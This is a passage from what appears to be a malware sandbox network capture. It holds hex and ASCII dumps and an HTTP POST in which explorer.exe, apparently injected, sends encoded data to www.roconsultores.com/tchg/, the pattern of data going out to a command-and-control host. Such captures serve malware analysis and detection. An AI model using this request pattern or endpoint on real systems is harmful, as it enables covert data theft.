                                                                                                                    May 30, 2023 11:10:12.534601927 CEST880INData Raw: 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99 f2 56 8a 87 e9 e1 08 2a 91 a6 52 e7 43 78 ce 7b 6b 7f 5f d6 68 0b 54 ea fe 21 64 6e 44 33 da c1 62 a2 78 69 04 dd db ac 90 0e bf 1a 78 1c 05 b3 c7 cb
                                                                                                                    Data Ascii: /VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g^v/o[[iG^6|h7+*(Dk3Aa0;
                                                                                                                    May 30, 2023 11:10:12.534667015 CEST882INData Raw: c9 54 67 1a 30 2b f3 7c c0 9d 7f 7e 40 28 27 a3 a2 c2 c4 c1 7f 48 9c c1 95 9f 7b a1 33 da 0f 6a 73 72 14 8e bf c3 54 0a b8 15 93 4d 85 8f e2 89 a2 e4 ee 73 4d dc 93 44 09 6b 3d bb 14 7b e3 c2 b9 6a 18 2d da 1c 9a 9d e4 b2 6f 1b 1b 85 7c 6d 34 61
                                                                                                                    Data Ascii: Tg0+|~@('H{3jsrTMsMDk={j-o|m4aG+.<W6CYkGm^jTRm=9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c8
                                                                                                                    May 30, 2023 11:10:12.534722090 CEST883INData Raw: fb f0 37 a2 52 89 70 e5 1d 57 4f fb 7e a6 e9 fa a0 ae 62 ab 21 d6 2f 10 97 72 01 9f 08 bd 14 f9 40 e3 85 f3 fd ae 88 fb cd ed 6c 9d f6 05 2d 45 03 1a db 0a fb ea 6c 0d 09 c9 f1 51 4b be d9 24 b5 db 67 c9 06 a6 de f8 da b2 59 c2 7a 4b 6f 0b 46 b7
                                                                                                                    Data Ascii: 7RpWO~b!/r@l-ElQK$gYzKoFfKl]DX>+5Oj<u.K!t[EVdpiJ<8)3~(9szG|o(X\v#S3fuHpi"S)*f.Tr#'


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    41192.168.11.2049800162.215.249.4080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:15.046648979 CEST892OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.roconsultores.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.roconsultores.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.roconsultores.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4d 4c 47 71 50 59 64 66 44 30 37 75 28 4b 53 58 28 68 45 33 41 45 4f 78 76 67 7e 38 69 2d 38 74 47 47 72 56 47 61 53 78 77 42 77 74 37 69 58 42 62 4d 77 53 6e 5f 58 71 28 68 76 66 30 45 49 48 4e 49 41 6c 63 4a 6a 48 53 48 72 46 46 4f 6b 45 71 64 42 6b 4f 34 76 42 34 4a 45 6f 69 58 77 30 50 46 53 68 67 45 64 6f 48 6e 79 6e 4b 7a 67 43 38 71 70 78 42 6b 4a 30 69 62 75 4f 30 59 46 32 76 6b 37 2d 48 44 34 36 50 53 33 4b 36 55 51 7a 7a 67 4e 66 59 69 44 66 79 5a 7a 34 28 71 30 54 55 56 68 41 52 67 6c 5a 65 63 58 68 72 43 68 6d 4f 71 69 38 78 44 54 68 37 58 47 6e 68 61 61 33 37 65 31 53 55 70 28 59 68 4c 43 43 69 4f 30 62 70 78 4b 61 62 30 4f 58 73 56 76 49 4f 4c 75 77 66 52 7e 6c 76 64 63 6d 42 57 32 68 44 53 70 45 72 77 73 39 4f 46 6a 58 6f 42 28 71 34 57 70 56 64 6c 4c 73 51 55 66 76 4b 65 37 44 5a 53 53 74 76 4e 4f 73 31 31 36 53 6c 6d 65 7a 30 43 48 6e 65 76 33 79 6b 57 4f 4c 41 55 52 39 28 76 37 32 4b 44 39 4d 49 6b 54 4c 64 4b 4e 6b 72 78 4b 70 58 41 49 62 6c 46 4c 56 4f 36 55 75 62 70 51 59 58 4b 55 30 6e 76 68 44 38 5f 34 68 39 79 48 42 62 73 61 70 66 59 54 69 33 63 65 58 63 35 5a 5a 54 4b 42 35 4b 58 45 36 4f 36 4a 52 79 76 47 63 76 75 7a 63 4d 32 4e 34 76 48 63 42 61 4b 31 42 34 4c 34 30 4b 64 38 38 4f 72 71 59 33 61 42 4d 5a 6b 55 31 74 57 4a 65 52 4c 74 63 45 44 54 73 6e 30 63 78 43 6e 78 53 57 68 44 7a 51 62 30 6d 75 63 39 6b 47 75 69 54 42 4f 73 5a 6a 35 50 4b 75 34 78 4d 54 6c 65 69 79 65 61 41 35 4c 70 78 4e 2d 47 63 77 37 56 38 7a 6e 6d 39 70 38 75 4d 51 48 36 41 28 65 61 53 6d 35 65 4a 44 5f 31 6d 4c 48 35 66 67 35 66 48 39 36 74 54 52 6d 72 33 4d 78 46 56 79 79 33 71 79 50 44 5f 48 65 6e 49 34 47 7e 61 78 32 7e 47 6d 31 63 30 37 7a 51 44 68 48 28 4a 61 54 66 31 6a 38 6c 64 64 76 77 34 4d 46 46 34 78 49 41 75 50 48 62 77 4e 6a 6e 69 71 6e 6a 6b 61 55 33 76 69 37 46 77 4c 65 35 43 44 51 6b 75 63 46 73 77 41 4d 41 74 33 79 70 49 6e 63 59 39 54 4e 34 38 6b 55 6a 79 53 63 72 46 59 74 6a 59 5a 78 42 67 6e 5a 73 4b 57 59 51 52 58 72 33 66 51 4c 47 38 64 53 75 4a 55 33 37 4e 6e 42 48 2d 73 53 77 43 6e 5a 66 43 4d 41 36 44 33 54 66 54 70 77 6a 4b 46 31 77 71 7e 6e 4e 51 6e 4b 62 77 79 79 57 54 45 70 46 47 30 30 6b 33 65 64 4c 46 6d 4f 48 43 46 79 4f 65 41 68 68 41 41 2d 58 33 35 42 75 38 34 38 77 2d 6e 36 44 4b 36 75 53 6f 37 4d 31 6d 54 49 67 4e 49 71 76 64 49 33 62 44 34 66 68 70 52 65 7e 62 4d 5a 42 62 66 58 7a 62 47 6b 45 47 33 69 47 33 28 57 79 38 28 30 36 4a 6c 66 58 67 30 47 42 41 34 4b 7e 4a 50 4b 61 4c 77 71 33 43 37 6a 4d 37 7a 4f 33 66 6e 65 4f 62 74 43 52 65 70 38 44 35 65 56 55 49 63 41 4c 6d 4c 4d 6e 69 70 54 7a 4f 5a 6a 43 71 49 6e 43 35 4b 61 6e 73 42 73 46 59 57 68 41 31 6e 4f 79 34 72 54 73 68 32 42 4c 50 56 37 41 52 28 5a 43 59 4f 33 56 4e 64 48 6a 35 72 47 50 59 73 72 59 31 53 7a 34 7a 30 62 5a 53 63 6b 75 62 43 35 5a 36 6e 4b 36 30 56 63 58 44 6f 49 37 4f 61 54 4d 36 74 6d 52 74 5a 71 58 67 46 42 43 36 47 4a 51 4d 5a 46 44 54 35 48 75 78 5a 30 55 67 65 32 67 2d 34 5f 54 6c 74 30 71 7a 73 68 6c 4f 4e 5f 34 75 75 75 49 48 28 30 31 56 4f 71 37 34 35 66 55 34 6b 52 6f 64 64 6f 64 55 58 58 66 50 79 45 6d 36 4e 62 38 63 41 35 6a 70 41 70 32 55 41 6f 4d 58 7a 6b 57 7a 44 45 63 58 53 4e 74 61 56 30 62 5a 4b 76 55 71 46 65 53 4d 4a 4e 31 35 54 4f 70 51 6f 5a 38 77 68 73 57 67 45 45 44 65 58 7a 72 6d 57 31 53 44 4d 78 6a 46 7a 43 77 42 4f 71 72 6d 7a 4c 5a 54 49 59 54 6b 56 47 32 55 58 47 63 51 7a 70 55 4b 57 46 38 6e 4a 55 57 51 74 65 50 6e 37 46 31 45 43 4c 4d 64 54 33 38 6f 6a 6f 4a 73 31 34 54 79 51 79 55 33 58 6d 45 50 66 69 79 64 31 47 56 49 58 77 4a 34 32 45 66 47 63 59 42 75 6a 43 74 42 46 4e 59 6d 4e 4d 74 38 56 67 4d 4d 77 44 50 5f 43 2d 48 5a 56 73 28 62 7e 77 57 6e 38 48 28 73 33 54 7a 4a 57 68 7e 76 6e 7a 71 53 6a 31 61 65 37 66 4a 34 41 69 42 57 33 72 6a 53 4b 4c 55 36 59 39 41 32 61 76 6f 71 55 75 56 62 34 74 38 4d 62 74 42 54 52 4a 55 4a 69 41 65 67 52 30 5a 42 39 54 32 32 6f 64 4b 62 76 42 70 4f 57 75 34 57 55 72 4e 76 4e 54 79 4c 57 44 49 53 47 46 51 4b 39 52 62 55 4c 77 63 39 7e 51 74 44 56 79 36 6f 75 75 37 64 50 56 5a 4e 75 4d 32 65 76 38 4d 79 56 45 57 44 4f
                                                                                                                    Data Ascii: O0qEM=MLGqPYdfD07u(KSX(hE3AEOxvg~8i-8tGGrVGaSxwBwt7iXBbMwSn_Xq(hvf0EIHNIAlcJjHSHrFFOkEqdBkO4vB4JEoiXw0PFShgEdoHnynKzgC8qpxBkJ0ibuO0YF2vk7-HD46PS3K6UQzzgNfYiDfyZz4(q0TUVhARglZecXhrChmOqi8xDTh7XGnhaa37e1SUp(YhLCCiO0bpxKab0OXsVvIOLuwfR~lvdcmBW2hDSpErws9OFjXoB(q4WpVdlLsQUfvKe7DZSStvNOs116Slmez0CHnev3ykWOLAUR9(v72KD9MIkTLdKNkrxKpXAIblFLVO6UubpQYXKU0nvhD8_4h9yHBbsapfYTi3ceXc5ZZTKB5KXE6O6JRyvGcvuzcM2N4vHcBaK1B4L40Kd88OrqY3aBMZkU1tWJeRLtcEDTsn0cxCnxSWhDzQb0muc9kGuiTBOsZj5PKu4xMTleiyeaA5LpxN-Gcw7V8znm9p8uMQH6A(eaSm5eJD_1mLH5fg5fH96tTRmr3MxFVyy3qyPD_HenI4G~ax2~Gm1c07zQDhH(JaTf1j8lddvw4MFF4xIAuPHbwNjniqnjkaU3vi7FwLe5CDQkucFswAMAt3ypIncY9TN48kUjyScrFYtjYZxBgnZsKWYQRXr3fQLG8dSuJU37NnBH-sSwCnZfCMA6D3TfTpwjKF1wq~nNQnKbwyyWTEpFG00k3edLFmOHCFyOeAhhAA-X35Bu848w-n6DK6uSo7M1mTIgNIqvdI3bD4fhpRe~bMZBbfXzbGkEG3iG3(Wy8(06JlfXg0GBA4K~JPKaLwq3C7jM7zO3fneObtCRep8D5eVUIcALmLMnipTzOZjCqInC5KansBsFYWhA1nOy4rTsh2BLPV7AR(ZCYO3VNdHj5rGPYsrY1Sz4z0bZSckubC5Z6nK60VcXDoI7OaTM6tmRtZqXgFBC6GJQMZFDT5HuxZ0Uge2g-4_Tlt0qzshlON_4uuuIH(01VOq745fU4kRoddodUXXfPyEm6Nb8cA5jpAp2UAoMXzkWzDEcXSNtaV0bZKvUqFeSMJN15TOpQoZ8whsWgEEDeXzrmW1SDMxjFzCwBOqrmzLZTIYTkVG2UXGcQzpUKWF8nJUWQtePn7F1ECLMdT38ojoJs14TyQyU3XmEPfiyd1GVIXwJ42EfGcYBujCtBFNYmNMt8VgMMwDP_C-HZVs(b~wWn8H(s3TzJWh~vnzqSj1ae7fJ4AiBW3rjSKLU6Y9A2avoqUuVb4t8MbtBTRJUJiAegR0ZB9T22odKbvBpOWu4WUrNvNTyLWDISGFQK9RbULwc9~QtDVy6ouu7dPVZNuM2ev8MyVEWDO6sLqq1dIit7TH3GtB6LuTiqVf1Jb0QtT7w6kim44kknmdJJE6xSHYK1HFGrzEiO0m7z5xj6~z5B8t3CtaD8VujMxmGIu6W1nomUlE6dgEwB5uWVGweEQy2V5Mg5yLdowNsJJwMgQsMAZegRWVekPZ8da-BZvRPfX6lGqBOR2VHX0luwzvzmE22i5aEp6OszJ74tp6UD1LEqKaUHBKt9YlduMJVffalWH_CRFvWj6udolFYcCP~486ZSwO5x45H8gG6OY5pSnNy1ekikjnaLzWXLlET5O2sZEW8-C74ePjvvOn7JNAjpnajtT9~HzuEk4PBrBjnVRJnNAwheKRm6Sqt6xIrabR1KhKB0LcGSysawt1nNz5e2QUQwJ_cFm6~AaDJHMytkxP~0zKuo6etumxi8QMzVo25jR1B5pxUAJS4vCPcMlt0MUXCwHkn8LfnSAIiNblQGI2zzxrGM9jJ7Xa~eKRqGW9MbKYb9dSHcNnb-rB5okGsBzgnHimQA2vRoRABoLDyBWTwMCEt3wDWkCYZVYrNpaN3HYZifzg0P0U3wi1I8(6VtaI9YFQhQuqKa2nT_xzzpDi4aNM0CrGnQY-M5OUKQNd1lidOXJChwGuvSmRaAanp4xCz5IvLjJyOkfiudFLEDeol532wozu1G4PhujyF-6ZYds1bARzBfWbxQ8SbiLq~rzwqmIf~n2jUuFHLTyMbPjCQU0RLT84EDqbi_4V2fUL57Df7vTCHoeUqATuHAgJ5mgMYE7AYHXZFAumWWwkfSfCWn5B5uxUgkP6mWSFYMPcgD9gAtBVLdIpiQMp9Jc5gW~dn66dpuv1t6LJbQJW(f3kCBxJUf~0nMNepZFd0yLAq_vKOhZdPmmxWPIeO2XG7rK6c2NpsOFF9xq9R8k6Zk(qArlCuA11naBtyoBdSMKMrq185MHDSr1In-n_dkLcQTJgk4PLvRl8(R~4s6~mUwikLrmJYIuc3_21D9MX255r~6VXik2A(lhUYaLfGc0l4OD2m7kNtIyVuWiOOPJ5ffH4UIrr6EhHqu2QhsxyEYVqzRx1tvrcQD1tfg(rDmEp1fI0hOWjdmtD~Hlue8IIGLQgJFgd(JJCxNxP3oGAfX4Ng5xcnLbYW4q26a1TwoKT5eChjkweK8UknaeWN57Ts2LG39zai6L3rSBB5awJMmzdzNqQ4JnvYGo3T4YCqEij9LoCfH15dNXhA01F(mpBEFzQqYzPWt3dEzO04kGUpOAK04AJEX10mwCpB4o8dYTB36pmKxdLqXt0Hk41WqZWkMlR3MX0sIcQfvn2iW9zJF5gyotPqVCi7FM-cihnS45QWCHBHZzc9d3pvxBah05VcFKGLWyTXktJueiv3D8Js7Gqv6bDCWgI6aXpRfq1gh1oYu7ZeyuJhz3dhAoCp1qTTfM3zDoXE_LioVs_jIDX6G5EO2ESJiqrSbd3rYRnvZzx4hX63KkuRyFmSYLGEnbGYb157quvCxoW(9FlrnmRf1eKiuxg(sVMclmC7Y40Layk8QOXOpQVLGUo(RMdAtqCtt3U3hBRhK99FUIU8iNyuorPyQoSfaQVmcZYTRkMFSLk(H5FRwPcyJR_117g5AldghOqjq12834Nm2wvFqI_LB2Q1uCY6AznjJeyOjKPiqhH(6k3eDoRsFk_md6Bg-vOiEtBytHKqbpBLf6eVwmQjYFKxacVmQq0b5PDk3dQUUVBO7d_ZF3rB_PouL~qw2qxVzABDccWBTEazanpPxB2WLIfkefn0bV8(X774XSr8Kzf1M9pGp41H9AXi7e2Vc6zdKy5h1l1Ppjd6J1tmwC-MtDoDsbmf2e8GRSsfkmJ2RHjUEGDZIXdVM8ZLoOwljCkmHWzMoChTX0QQ-qcjYga4daaGOvhM5wNs4~4yzSHEbaIaK4yAs(2uyflltJYGXdBaS~MXo~faHlp5nAXKuJM7S~eGFcx0vybhMA-prFRV6uci2thfnoXCKVkSkSU3neOCk9NIyxQP4JI4tqIaN2EIaqPm3jXVUcEpsCzp0M2AktNxdA6Xh7PyjjUzUZZqDC6XcqNjtBDZ6tJqFZgiiPh3BMCxPaPyTWvP7B1M56xZbIHZW2S6fmzadYyDeF3sci3Qv~IzlPEE-7j6SME(BOkZJgQgAoM6kjeBnGyghcLKtRxzuuOLtxpYt5d0OlrrLur29s8k939WdfNum6ydXmYiMaZLfSCkvefDe1kZ5O0~FXk8rTalHDhJ8hw3ZluDcTgPTkxwhRt77qM796iv68vmrSmT69pgWyYec8nvF3S8_FBdx4y4Pty1acZ9GHo3Or7X89bp7s6OFrT8-eXB4yr(d4Sb-D-kqqsYwxuEfWQ7KURxiZzUgIsh2OrxkdbH93YbYj3QNb-HctTBeAoz9UeoK~VGvj3SM464jVN2ifgVIDImIWwIuKcVUFm(tZ-2XB-4fPc9ohnl1xm4TMtMtG0BBrIoQkd1iaVM8nZcaXO4dyAtVlV6jxpX0pG~ulKepJX3sxih9sMjU(DkElJ0Lgk6JDtHdcV90qU8oy0iQkGKCm0D4tLZy6NGgbt8i30rCofb2iWifSJflG-duKM87Kec5iGoYRqdd6ztIwbb0(QVEYSe0Hml4dWExa_8YYtCnYuTsbP8yc3gZQHRGIPKNF5FEZiQe01tD5rsBrDf4IQPoxo4dgOhuAkRp2Imw82p9NzonCzNZzn5C1nixph0G2ne-uMRWhMbX
                                                                                                                    May 30, 2023 11:10:15.046735048 CEST896OUTData Raw: 35 7e 68 58 56 37 76 4a 69 39 6a 39 74 71 44 45 33 47 6a 33 30 70 54 64 69 41 53 54 30 5a 4b 37 71 55 73 4e 5f 4e 6f 53 63 63 2d 69 51 7e 57 43 75 73 71 30 33 59 70 32 48 38 66 6a 66 52 4e 43 5a 5a 50 6d 38 48 5f 53 49 4a 72 65 7a 4b 6c 30 69 28
                                                                                                                    Data Ascii: 5~hXV7vJi9j9tqDE3Gj30pTdiAST0ZK7qUsN_NoScc-iQ~WCusq03Yp2H8fjfRNCZZPm8H_SIJrezKl0i(kigEPjXN-of1mvNaEg04TZTJo30bA1FwinEX6T2XOlMRcR-Lo7xmnrz6g8whCzCMYxjsOilmRIQ9S4PaDNbNuu02GxGWBa7kj~ZCHxEc7rFAu~ysn77iNC40U85MWblfsY_eaisawbSJuVV6i7GLOX5jP~CcngnRX
                                                                                                                    May 30, 2023 11:10:15.212363958 CEST897OUTData Raw: 6f 36 56 41 44 49 4d 59 52 5a 4d 39 67 66 51 54 57 72 5a 6a 67 63 56 5a 38 74 74 39 44 56 6c 56 52 32 6e 69 72 58 4f 6a 7a 6e 75 7e 51 45 66 4d 55 69 6a 70 4c 35 53 58 76 57 4a 62 45 46 4b 48 4a 33 61 41 74 75 6d 50 51 7a 6a 33 7a 6d 58 44 65 61
                                                                                                                    Data Ascii: o6VADIMYRZM9gfQTWrZjgcVZ8tt9DVlVR2nirXOjznu~QEfMUijpL5SXvWJbEFKHJ3aAtumPQzj3zmXDeavsj51xOyujRd7z5RTZ6QCWbf9m18hG0etVDp50yEMmSzhq578odhzOpJ3pXTNNyPvzoM2cYxoVq~fFkFuBfKQcUUapVptfDjm9YNWNs6gu2fBg4y8l8OWi3XSMIIbeaYysZFMfSIobYXNB4q84Kw96X4llZ88YXcX
                                                                                                                    May 30, 2023 11:10:15.212436914 CEST899OUTData Raw: 2d 6d 72 4f 34 47 54 7e 6f 75 68 37 6f 37 4a 4a 58 5a 4e 4d 4e 6a 66 28 6d 30 47 4b 62 67 73 53 39 6d 64 7a 50 4e 76 38 34 34 4b 6d 62 53 68 6b 37 7a 75 7a 55 64 49 7a 43 37 68 35 5f 74 63 54 37 76 54 76 4f 77 33 68 6d 74 66 64 53 66 39 57 62 66
                                                                                                                    Data Ascii: -mrO4GT~ouh7o7JJXZNMNjf(m0GKbgsS9mdzPNv844KmbShk7zuzUdIzC7h5_tcT7vTvOw3hmtfdSf9WbfdrYLIrxX3fLRIz90KB3crOTfCevPe0JlhzeSoIoUYq0BBLcq89hDZnbqRppG1ORoLOP44RmMJJl2cN1h2Fxmmd43_7_b2wXGXD_ad(NEe~XbRt2qoXuZP0DNAHleJb8MVqSLM0jppTL(0mv5C56ewk3ShNrbPwtOu
                                                                                                                    May 30, 2023 11:10:15.212492943 CEST900OUTData Raw: 7a 55 35 79 4d 4b 4a 76 4a 57 35 6c 62 53 6b 31 4b 57 43 66 34 62 4e 7e 4f 28 6c 65 48 38 4b 69 59 4e 42 46 69 48 63 66 6e 75 31 76 78 34 39 47 43 30 6e 43 39 76 53 4d 73 68 5a 77 32 62 61 6b 4e 6e 6c 31 36 53 70 33 62 49 73 79 34 6a 59 47 42 4b
                                                                                                                    Data Ascii: zU5yMKJvJW5lbSk1KWCf4bN~O(leH8KiYNBFiHcfnu1vx49GC0nC9vSMshZw2bakNnl16Sp3bIsy4jYGBKOpcy1LSFQbhBrCGiO1sjHJbiGPOiKBdsMoh(HIbs9QX5k1AsPC7YBbIHOjeLKnW4tWi2xlg(3o3NzZC5u~DU7p1B0s3ioCl3jUsA24pe-OPD3UwD7xvPXgTAJ0Q5-Hcwh3xN5omyXQNHobr5WMrcdfaTaO483hUPT
                                                                                                                    May 30, 2023 11:10:15.212678909 CEST914OUTData Raw: 4b 74 6d 75 39 6b 4e 6b 38 6e 74 31 59 69 4f 6d 45 78 53 6f 43 4a 53 38 4e 4c 69 6a 71 62 75 65 68 4b 4b 34 4e 51 52 65 5a 6c 31 61 78 30 36 6b 59 49 78 67 75 57 63 37 43 77 62 57 33 47 61 32 4e 76 44 7e 4b 62 65 57 73 35 41 4a 54 35 75 7a 70 50
                                                                                                                    Data Ascii: Ktmu9kNk8nt1YiOmExSoCJS8NLijqbuehKK4NQReZl1ax06kYIxguWc7CwbW3Ga2NvD~KbeWs5AJT5uzpPB0r~fbh7wvVHuzPQlBP7Lo2RwAMfOxbkE3GdswIMaOR70NcQMyhbSWtNkzwcIv7j7f3KAYwEK9DxPJ8J31Fpj0pVVd7XGPntev593ifY83-C0MLQ3unhbLfZFYGCUp_~VIaLOzgxN2q0fooXuAe9qC7Nc(wVxCYVP
                                                                                                                    May 30, 2023 11:10:15.212838888 CEST915OUTData Raw: 4d 51 4e 56 4d 4a 48 69 39 42 6a 66 34 36 45 7a 46 58 59 49 68 69 61 71 59 68 57 31 4d 58 7a 50 64 35 46 78 53 53 74 59 51 66 68 56 5a 64 59 71 32 43 56 4d 73 77 54 53 63 78 49 6e 49 62 70 6f 41 4f 75 6a 54 58 69 61 45 7a 59 48 61 41 2d 52 52 6a
                                                                                                                    Data Ascii: MQNVMJHi9Bjf46EzFXYIhiaqYhW1MXzPd5FxSStYQfhVZdYq2CVMswTScxInIbpoAOujTXiaEzYHaA-RRjZOeIhsaR280j2fCzOdy7Uj-5o3cpFxVtQIl~lqPK41GUpiEOzkgxv~XupQkItJeyaa6F88MatFbsCLBTZQhSm3BsrDs2RxafzNVRJArA-ujfxQTvtGHk_XTiGI44oljL0WrPBWGcptp6BEH6fV7I5RUAxvEakddcj
                                                                                                                    May 30, 2023 11:10:15.213017941 CEST922OUTData Raw: 72 4d 42 68 50 32 44 64 39 74 4c 61 4e 56 6f 6b 53 43 4c 44 6c 6c 68 65 75 50 51 5a 2d 78 6a 44 44 35 4d 57 68 53 6a 35 59 63 59 69 44 44 30 69 45 7a 61 4f 4e 6c 52 36 54 35 6f 61 34 41 5f 41 50 6b 39 6a 79 31 4b 61 6d 35 6f 5a 4b 6b 4b 47 65 74
                                                                                                                    Data Ascii: rMBhP2Dd9tLaNVokSCLDllheuPQZ-xjDD5MWhSj5YcYiDD0iEzaONlR6T5oa4A_APk9jy1Kam5oZKkKGetjhAjVTjUSg7GOKojHCOPhvzhaKVzeg9OHQcvcht4zcTXZqc2yDksHoT9gbx34Nm16i2JzMoqHTBtqD-VqBAygY97zPDNgfJy27Z1Jcn4EFUFKUG(P(X52ksCktW3Pb0RauVqlUtjbt6KSVDd72DCcSM5Fq_TmE8eq
                                                                                                                    May 30, 2023 11:10:15.378139973 CEST924OUTData Raw: 64 57 61 79 32 69 46 64 74 38 2d 41 59 49 31 35 71 78 33 51 54 44 32 50 31 36 4e 44 4f 42 63 45 5f 62 62 53 42 72 5f 6f 62 50 79 4d 37 54 33 67 37 69 48 70 78 36 6c 44 73 76 57 32 38 67 4c 45 46 67 48 59 6b 51 68 70 78 55 39 58 56 53 53 44 6b 4d
                                                                                                                    Data Ascii: dWay2iFdt8-AYI15qx3QTD2P16NDOBcE_bbSBr_obPyM7T3g7iHpx6lDsvW28gLEFgHYkQhpxU9XVSSDkM9KaVCX0HHESK80M14qtbvci1ykm9_rCY6WZR0ohjjXV5mOms1KM(yO6OX5ohOzD1vaUDCCwRdvUxo4KSucQ8nw5O4U8JVkh5M~K8GxVxT0dzFlNuEaoLo~8CJX8NfmDnfBPASbZAr(BYeR6HBDkDKjLhQKy7fnmOi
                                                                                                                    May 30, 2023 11:10:15.378226995 CEST930OUTData Raw: 45 78 48 50 73 6d 71 65 5a 4a 71 36 6f 76 6d 50 70 72 74 51 2d 62 42 41 5f 41 44 33 59 30 67 56 6e 57 65 4a 42 38 66 75 51 67 55 50 30 39 30 74 6c 32 36 65 41 5a 61 76 2d 70 4e 28 5f 51 61 76 46 53 32 74 39 33 4d 6c 47 65 78 56 45 59 31 73 4a 66
                                                                                                                    Data Ascii: ExHPsmqeZJq6ovmPprtQ-bBA_AD3Y0gVnWeJB8fuQgUP090tl26eAZav-pN(_QavFS2t93MlGexVEY1sJf6QizOGFFwT9pXthHO7rzv7Y2oW0DEv1yX79QS20PNFikTQa666LjJl1yczBqzzqydXekQPY3khlzJVg0nDFVe0GY3Q592lFFkVQ4L6cEdSfq6YA4MfQqmDvjqEQ1XCs9iSeXBvMEqLTz17anuNRDC4OQnvRbaNOBp
                                                                                                                    May 30, 2023 11:10:15.378283978 CEST932OUTData Raw: 52 47 6a 6b 45 41 70 42 32 64 70 6f 53 79 30 51 31 43 38 64 74 63 64 36 66 69 69 51 4e 62 6e 33 36 6d 6f 32 6b 56 61 59 4c 6d 70 5a 49 59 76 6f 35 52 35 78 5f 51 79 4e 5f 62 35 72 33 75 32 38 77 30 50 34 55 45 71 45 68 52 56 47 31 79 4f 4b 52 74
                                                                                                                    Data Ascii: RGjkEApB2dpoSy0Q1C8dtcd6fiiQNbn36mo2kVaYLmpZIYvo5R5x_QyN_b5r3u28w0P4UEqEhRVG1yOKRtvmey_Tly5Kl5_OZJvgWrV4V51RHHHuJ60~u3HcqOUpQqkSUzqVfhQCOcONsJ3yOsipEhuH5BVHQmZN7PXGspX(AdspCoaaHBifhhuOAYpIAraXMv4BXqO5hHoUm3YKthZADnVVSlNSmP3fEfSibAxghCi0cocbd9T
                                                                                                                    May 30, 2023 11:10:15.547918081 CEST938INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:10:15 GMT
                                                                                                                    Server: Apache
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Last-Modified: Tue, 23 Apr 2019 07:54:14 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Content-Length: 4677
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 